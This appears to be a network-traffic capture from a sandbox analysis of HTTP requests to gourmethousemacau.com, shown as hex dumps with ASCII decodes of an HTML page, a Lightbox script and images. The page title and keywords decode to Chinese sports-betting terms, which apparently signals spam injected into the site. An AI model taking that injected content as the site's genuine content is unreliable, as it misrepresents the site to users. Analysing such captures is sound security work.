35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 30 38 30 3b 26 23 32 39 36 39 39 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 37 38 38 30 3b 26 23 32 30 38 37 36 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 33 30 33 33 31 3b 26 23 32 34 34 30 35 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23
                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="applicable-device" content="pc" /> <meta name="mobile-agent" content="format=xhtml;url=http://gourmethousemacau.com/m.html"> <meta name="mobile-agent" content="format=html5;url=http://gourmethousemacau.com/m.html"> <link rel="alternate" media="only screen and(max-width: 640px)" href="http://gourmethousemacau.com/m.html"><title>&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;</title><meta name="keywords" content="&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20080;&#29699;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#32593;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#27880;&#20876;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#30331;&#24405;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#
                                                                                                                                                              Mar 13, 2023 05:26:40.473509073 CET2789OUTGET /js/lightbox.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:40.792848110 CET2793INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 20701
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:12 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9e6c28a3a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Data Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 2f 2f 0d 0a 2f 2f 09 4c 69 67 68 74 62 6f 78 20 76 32 2e 30 32 0d 0a 2f 2f 09 62 79 20 4c 6f 6b 65 73 68 20 44 68 61 6b 61 72 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 68 75 64 64 6c 65 74 6f 67 65 74 68 65 72 2e 63 6f 6d 0d 0a 2f 2f 09 33 2f 33 31 2f 30 36 0d 0a 2f 2f 0d 0a 2f 2f 09 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6f 6e 20 74 68 69 73 20 73 63 72 69 70 74 2c 20 76 69 73 69 74 3a 0d 0a 2f 2f 09 68 74 74 70 3a 2f 2f 68 75 64 64 6c 65 74 6f 67 65 74 68 65 72 2e 63 6f 6d 2f 70 72 6f 6a 65 63 74 73 2f 6c 69 67 68 74 62 6f 78 32 2f 0d 0a 2f 2f 0d 0a 2f 2f 09 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 63 72 65 61 74 69 76 65 63 6f 6d 6d 6f 6e 73 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 62 79 2f 32 2e 35 2f 0d 0a 2f 2f 09 0d 0a 2f 2f 09 43 72 65 64 69 74 20 61 6c 73 6f 20 64 75 65 20 74 6f 20 74 68 6f 73 65 20 77 68 6f 20 68 61 76 65 20 68 65 6c 70 65 64 2c 20 69 6e 73 70 69 72 65 64 2c 20 61 6e 64 20 6d 61 64 65 20 74 68 65 69 72 20 63 6f 64 65 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 74 68 65 20 70 75 62 6c 69 63 2e 0d 0a 2f 2f 09 49 6e 63 6c 75 64 69 6e 67 3a 20 53 63 6f 74 74 20 55 70 74 6f 6e 28 75 70 74 6f 6e 69 63 2e 63 6f 6d 29 2c 20 50 65 74 65 72 2d 50 61 75 6c 20 4b 6f 63 68 28 71 75 69 72 6b 73 6d 6f 64 65 2e 6f 72 67 29 2c 20 54 68 6f 6d 61 73 20 46 75 63 68 73 28 6d 69 72 2e 61 63 75 6c 6f 2e 75 73 29 2c 20 61 6e 64 20 6f 74 68 65 72 73 2e 0d 0a 2f 2f 0d 0a 2f 2f 0d 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 2f 2a 0d 0a 0d 0a 09 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 73 0d 0a 09 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 09 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 0d 0a 09 47 6c 6f 62 61 6c 20 56 61 72 69 61 62 6c 65 73 0d 0a 0d 0a 09 45 78 74 65 6e 64 69 6e 67 20 42 75 69 6c 74 2d 69 6e 20 4f 62 6a 65 63 74 73 09 0d 0a 09 2d 20 4f 62 6a 65 63 74 2e 65 78 74 65 6e 64 28 45 6c 65 6d 65 6e 74 29 0d 0a 09 2d 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 44 75 70 6c 69 63 61 74 65 73 28 29 0d 0a 09 2d 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6d 70 74 79 28 29 0d 0a 0d 0a 09 4c 69 67 68 74 62 6f 78 20 43 6c 61 73 73 20 44 65 63 6c 61 72 61 74 69 6f 6e 0d 0a 09 2d 20 69 6e 69 74 69 61 6c 69 7a 65 28 29 0d 0a 09 2d 20 73 74 61 72 74 28 29 0d 0a 09 2d 20 63 68 61 6e 67 65 49 6d 61 67 65 28 29 0d 0a 09 2d 20 72 65 73 69 7a 65 49 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 28 29
                                                                                                                                                              Data Ascii: // -----------------------------------------------------------------------------------////Lightbox v2.02//by Lokesh Dhakar - http://www.huddletogether.com//3/31/06////For more information on this script, visit://http://huddletogether.com/projects/lightbox2/////Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/////Credit also due to those who have helped, inspired, and made their code available to the public.//Including: Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.org), Thomas Fuchs(mir.aculo.us), and others.////// -----------------------------------------------------------------------------------/*Table of Contents-----------------ConfigurationGlobal VariablesExtending Built-in Objects- Object.extend(Element)- Array.prototype.removeDuplicates()- Array.prototype.empty()Lightbox Class Declaration- initialize()- start()- changeImage()- resizeImageContainer()
                                                                                                                                                              Mar 13, 2023 05:26:41.240268946 CET2859OUTGET /images/menu01.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:41.465348005 CET2869INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 888
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "b629ef8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:47 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 28 03 01 11 00 02 11 01 03 11 01 ff c4 00 7b 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 07 03 05 06 04 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 01 04 01 04 02 01 04 03 01 00 00 00 00 00 00 01 02 03 04 05 11 00 12 22 06 21 13 15 31 41 81 14 61 32 42 07 11 00 02 02 01 02 05 05 01 00 00 00 00 00 00 00 00 01 11 00 02 31 21 12 41 51 61 03 13 71 81 b1 04 14 a1 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 bf 77 eb e5 99 e0 46 fd 22 37 e9 11 bf 48 8d fa 44 b3 67 37 42 ef 43 e8 06 e6 ce 7c 05 83 6d e8 10 a0 b5 2c 28 7e ca 73 b8 b9 2e 36 dc 78 c6 01 fc 6b a4 81 b2 af ac ee b0 a1 ec d3 71 23 38 0f 8f a8 9d 1f 7d a5 a8 5f 63 ef bd 9a e8 cc 93 0a b2 75 7c 18 d5 f0 9c 43 0e ba f4 88 a1 7b 96 eb 8d 3e 94 25 29 6c ff 00 83 92 71 e3 56 ee d0 6e b5 8c d7 ec f6 eb be f7 b3 40 81 a7 51 ef 35 0e f4 8e b1 0d 37 16 92 a4 d9 bf 4d 1f af d7 df d6 45 69 6c a2 50 4c e7 90 d0 61 f5 a9 a5 23 20 a8 f3 4a 47 8c 2b 69 fe a6 3c 55 0c ea 93 94 3f 5a 81 92 4a da 2c 30 f5 e0 66 47 ba 5f 50 7a 4a 6b 60 3d 70 89 b6 3d 6d 5d 86 b5 f9 0e c7 2d 31 88 c6 42 63 ba 94 34 0b b9 08 50 2b 05 18 f1 c4 e9 e2 ae 03 c3 83 f5 fb 64 a0 d9 ae e1 8e 4d 63 5f 5d 24 0f f9 fd 04 6a fa e4 59 5a a2 24 fb 1a 51 6b f2 ae 5a d7 32 c3 4e bc c9 7d 86 0d 7b 84 49 58 50 da 82 b0 a1 c8 e4 27 03 4f 0d 56 bc b9 8f 88 fc b4 00 33 a9 0d b1 ea 02 cc a8 a4 5b cf 97 02 ba b2 43 fe c8 35 3e ef 8f 63 62 47 af de a0 b7 39 00 14 72 a1 9f 24 ff 00 1a c8 92 42 9c 66 e4 80 0e 04 de 8e f5 d9 ff 00 7a d6 c1 cb 06 e4 3f 78 1b 16 cd 48 8b 19 f8 f2 3d 20 06 ca e3 ba d2 99 25 20 78 3b 32 3f 3a b7 92 cd f3 9a 7e 8b b2 5e 73 a0 f8 c4 f2 49 ed bd 82 62 ad d5 26 c5 4f 1b d6 1a 8d 66 0b 6d e1 6c b0 b4 2d a6 d2 02 70 da 50 50 9c 04 6d fa 63 e9 a8 37 b1 7d 65 4f 7a e5 b3 9c c8 47 6c be 6e 54 79 a8 9f 89 31 6b 7e 21 87 3d 4d 71 87 ea 53 3e ac 6c c1 e0 a2 37 11 bb ef 9c e9 bc c7 9a ed be 0b da 65 1d c2 f0 d7 b3 58 f3 90 e6 c5 8c c1 8d 15 53 20 43 94 f3 4c 9c f0 6d f7 d9 5b a8 03 3c 76 a8 6d fb 63 4d e5 29 3e 7b 25 a1 1d 40 3f d2 1c e5 79 6a 26 51 cb 48 8e 5a 44 72 d2 23 96 91 3f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed({"!1Aa2B1!AQaq?wF"7HDg7BC|m,(~s.6xkq#8}_cu|C{>%)lqVn@Q57MEilPLa# JG+i<U?ZJ,0fG_PzJk`=p=m]-1Bc4P+dMc_]$jYZ$QkZ2N}{IXP'OV3[C5>cbG9r$Bfz?xH= % x;2?:~^sIb&Ofml-pPPmc7}eOzGlnTy1k~!=MqS>l7eXS CLm[<vmcM)>{%@?yj&QHZDr#?
                                                                                                                                                              Mar 13, 2023 05:26:41.497806072 CET2869OUTGET /images/pic_aboutus.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:41.704111099 CET2887INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 126846
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1ca9f0f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:47 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 1b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 c8 00 00 01 01 00 03 00 00 00 01 01 34 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 33 20 31 30 3a 34 30 3a 34 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 c8 a0 03 00 04 00 00 00 01 00 00 01 34 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 2e 95 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a
                                                                                                                                                              Data Ascii: 0ExifMM*4(12i ''Adobe Photoshop CS6 (Windows)2020:06:23 10:40:4302214nv(~.HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:
                                                                                                                                                              Mar 13, 2023 05:26:55.269575119 CET3079OUTGET /images/loading.gif HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:55.476422071 CET3081INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2767
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "cac8ecf7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:00 GMT
                                                                                                                                                              Data Raw: 47 49 46 38 39 61 20 00 20 00 f7 00 00 ff ff ff b3 b3 b3 fb fb fb d6 d6 d6 e1 e1 e1 f2 f2 f2 ba ba ba 81 81 81 34 34 34 01 01 01 1b 1b 1b c4 c4 c4 97 97 97 fd fd fd 54 54 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 0a 00 00 00 2c 00 00 00 00 20 00 20 00 00 08 fa 00 01 08 1c 48 90 e0 82 03 0b 0a 2a 5c c8 70 e0 81 87 05 09 14 68 a8 70 80 81 82 0f 0f 10 1c c0 91 22 c1 02 0f 03 10 cc 38 b0 00 c7 01 1e 47 3e 44 29 90 a4 c0 93 04 52 0e 34 f0 90 81 43 88 00 08 9c 94 49 90 c1 c3 8b 00 5c c2 e4 39 70 c0 01 9f 13 1f 3a c8 b9 73 a0 ce 01 31 5f 32 60 90 70 60 80 9f 0a 75 96 3c 09 75 e0 82 a9 53 59 1a ad da 90 6b c7 9e 60 a7 46 f5 68 76 ed c6 b4 36 53 3e 75 bb f0 2b 03 96 72 79 12 00 4a b4 2f 51 b3 1c 4d 2e 30 40 b8 70 5f c0 1c 0b 2b e6 2b f3 e4 02 98 03 06 2f f6 4b 59 26 5d 8a 97 19 ce f5 b8 39 a5 d9 89 0a 4d 72 e5 09 b8 60 69 cc 78 9f 72 5c ab ba eb cb cb aa 09 76 66 ea fa e5 6a 00 4d 4f 82 26 2a 5a ec
